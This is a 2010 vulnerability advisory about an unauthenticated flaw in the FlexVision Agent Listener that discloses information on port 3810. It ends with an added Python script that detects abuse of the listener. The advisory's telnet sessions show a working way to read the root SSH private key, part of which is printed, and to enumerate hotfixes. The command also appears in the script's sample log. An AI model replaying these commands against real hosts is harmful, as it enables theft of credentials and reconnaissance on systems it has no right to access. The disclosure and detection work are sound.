=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]=============

Information Disclosure Vulnerability in FlexVision Agent Listener
-----------------------------------------------------------------

Authors:
Victor Ribeiro Hora - Tempest Security Intelligence - Brazil

=====[ Table of Contents ]=================================

1. Overview
2. Detailed description
3. Additional context & Solutions
4. References
5. Thanks

=====[ Overview ]======================================

* System affected: FlexVision Agent Listener 1.3 for Windows, Linux and Solaris (other versions may be vulnerable)
* Release date: 22 October 2010
* Impact: Successful exploitation of this vulnerability may lead to remote disclosure of sensitive information from the affected server.

FlexVision [1] claims to be an IT service focused on hardware and software management, offering features such as capacity planning, SLA monitoring and systems inventory. The service is used by several major companies in Brazil, including the banking, telecom, energy, health and independent product sectors.

The vulnerability was found in the inventory agent listener, "fval". Exploitation of this weakness does not require any authentication and may lead to remote disclosure of sensitive information from the server running the agent. Specifically, an attacker can download non-binary files and list running services, running processes and installed software. Some active filtering of well-known sensitive data appears to be in place, but other sensitive information can still leak.

=====[ Detailed description ]================================

The FlexVision Inventory service has several agents (servers) that collect data from different platforms and send it to a central console on the network. These agents are installed on the hardware to be monitored and listen for incoming client connections. One of the agents analyzed is the "FlexVision Actions Listener 1.3 for Linux", used for the inventory of Linux systems.
This agent is executed by a Linux binary called "fval", started at boot time through an initscript in /etc/init.d/rc.fval. The fval binary apparently performs a chdir() to /opt/flex/plugins, then opens a socket listening for connections on port 3810/TCP in daemon mode. As soon as the TCP three-way handshake is completed, the agent waits for "commands" that trigger the various inventory functions. These commands are interpreted as internal functions of the fval binary, such as help, version, exit or run. The run function expects a parameter, which we observed to be the name of a bash script file in the /opt/flex/plugins directory. This script is executed by the fval binary, and the output of the script is returned on the same TCP connection to the central console application.

These commands are normally sent from a central console to the monitored agent. Because the connection is neither authenticated nor encrypted, any computer that can reach the 3810/TCP port of an agent can send commands for the agent to execute. Although the agent applies an active filter for some well-known sensitive data (for example, password hashes in the "shadow" file), it is still possible to retrieve other sensitive data that the filter does not anticipate. Some special characters we tested were also filtered, such as '*', ';' and '>', as well as white space, tabs and other delimiters used by bash and other shells.

The following is an example of the recovery of the private SSH RSA key file of the root user on a Linux server:

-----------------------------------------------------------------------
vrh@victim01:~$ telnet 192.168.1.1 3810
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
FVAL>run symonfile.sh /root/.ssh id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG
eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz
Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ
9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o
z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe
3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8
xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO
s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW
XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV
-----------------------------------------------------------------------

Just like the Linux fval, the Windows version also allows any non-binary file to be dumped. Note that because fval always runs as a privileged user (Administrator/root), all system files are accessible and most of them are readable.

Windows hosts behave similarly. As soon as the agent is installed, it is registered as a system service and runs at boot time. This service runs the fval binary located in %SystemDrive%\%ProgramFiles%\Flexvision. fval will then run any file in the %SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory. By default, the Windows fval ships with several 32-bit Portable Executable (.EXE) files that provide inventory data to the central console; the most interesting is hotfix.exe, which lists all the hotfixes installed on the host:

-----------------------------------------------------------------------
vrh@victim01:~$ telnet 192.168.1.2 3810
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
FVAL>run hotfix.exe
Hot Fix ID.75=File 1
Service pack afetado.75=KB956801
Instalado por.75=
Descricao.76=
Hot Fix ID.76=File 1
Service pack afetado.76=KB956806
Instalado por.76=
Descricao.77=
Hot Fix ID.77=File 1
Service pack afetado.77=KB956848
Instalado por.77=
-----------------------------------------------------------------------

With that sort of information it would be possible to plan and execute a much more precise attack against the host.

=====[ Other contexts & Solutions ]============================

As usual [2], we contacted the vendor. After some weeks, they released version 1.4, which uses source IP based access control (a whitelist policy) and a static key for authentication, but nothing that addresses the actual problem: there is still no strong authentication scheme and no encryption of client-server traffic. Version 2.0 was just released; the vendor states that this version uses encrypted client-server communication, but we have not been able to test it yet. After waiting a few months, FlexVision did not provide us with a public URL for an actual fix addressing this problem to attach to this publication.

=====[ Thanks ]========================================

- Tempest Security Intelligence [3]
- Tempest MSS Team
- Evandro Curvelo Hora
- Marco "Kiko" Carnut
- Cristiano Lincoln Mattos
- Aldo Albuquerque

=====[ References ]======================================

[1] http://www.flexvision.com.br/
[2] http://www.cert.org/kb/vul_disclosure.html
[3] http://www.tempest.com.br/

===================================================

--
Victor Ribeiro Hora
Network Security Analyst & Security Baselines development
Tempest Security Intelligence
www.tempest.com.br
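As an added example (not part of the advisory or the vendor's software), the following Python detection logic flags fval command traffic on 3810/TCP that does not come from the operator's FlexVision console, and "run" commands that pass a file argument to a plugin, which is the pattern shown in the sessions above. Restricting who may reach the listener is the compensating control available while it remains unauthenticated; the log format, the console address 10.0.0.5 and the plugin name inventory.sh are constructed for this example.

```python
import re

FVAL_PORT = 3810
CONSOLE_HOSTS = {"10.0.0.5"}   # hypothetical allowlist of legitimate consoles

# "run <plugin> [args]" as typed at the FVAL> prompt. Plugins live in the
# plugins directory, so arguments that name other files or paths deserve a look.
RUN_RE = re.compile(r"^run\s+(?P<plugin>\S+)(?P<args>.*)$")

# Constructed sample records: "ts<TAB>src<TAB>dst<TAB>dport<TAB>payload".
# The first line is a legitimate console poll; the others are not.
SAMPLE_LOG = """\
2010-10-22T10:00:01\t10.0.0.5\t192.168.1.1\t3810\trun inventory.sh
2010-10-22T10:02:13\t192.168.1.77\t192.168.1.1\t3810\trun symonfile.sh /root/.ssh id_rsa
2010-10-22T10:02:20\t192.168.1.77\t192.168.1.2\t3810\trun hotfix.exe
2010-10-22T10:03:00\t192.168.1.77\t192.168.1.2\t80\tGET / HTTP/1.0
"""

def parse_line(line):
    """Split one constructed log record into a dict."""
    ts, src, dst, dport, payload = line.split("\t", 4)
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "payload": payload}

def classify(rec):
    """Return the reasons a record is suspicious; empty list if it is not."""
    reasons = []
    if rec["dport"] != FVAL_PORT:
        return reasons                      # not fval traffic
    if rec["src"] not in CONSOLE_HOSTS:
        reasons.append("fval command from non-console host")
    m = RUN_RE.match(rec["payload"])
    if m and m.group("args").strip():
        # run with extra arguments: a plugin being pointed at an arbitrary file
        reasons.append("fval run with file argument: " + m.group("args").strip())
    return reasons

def detect(log_text):
    """Return (src, dst, payload, reasons) for every suspicious record."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            findings.append((rec["src"], rec["dst"], rec["payload"], reasons))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

On the constructed sample the console poll and the HTTP request are ignored, while the two connections from 192.168.1.77 are reported, the first one with both reasons.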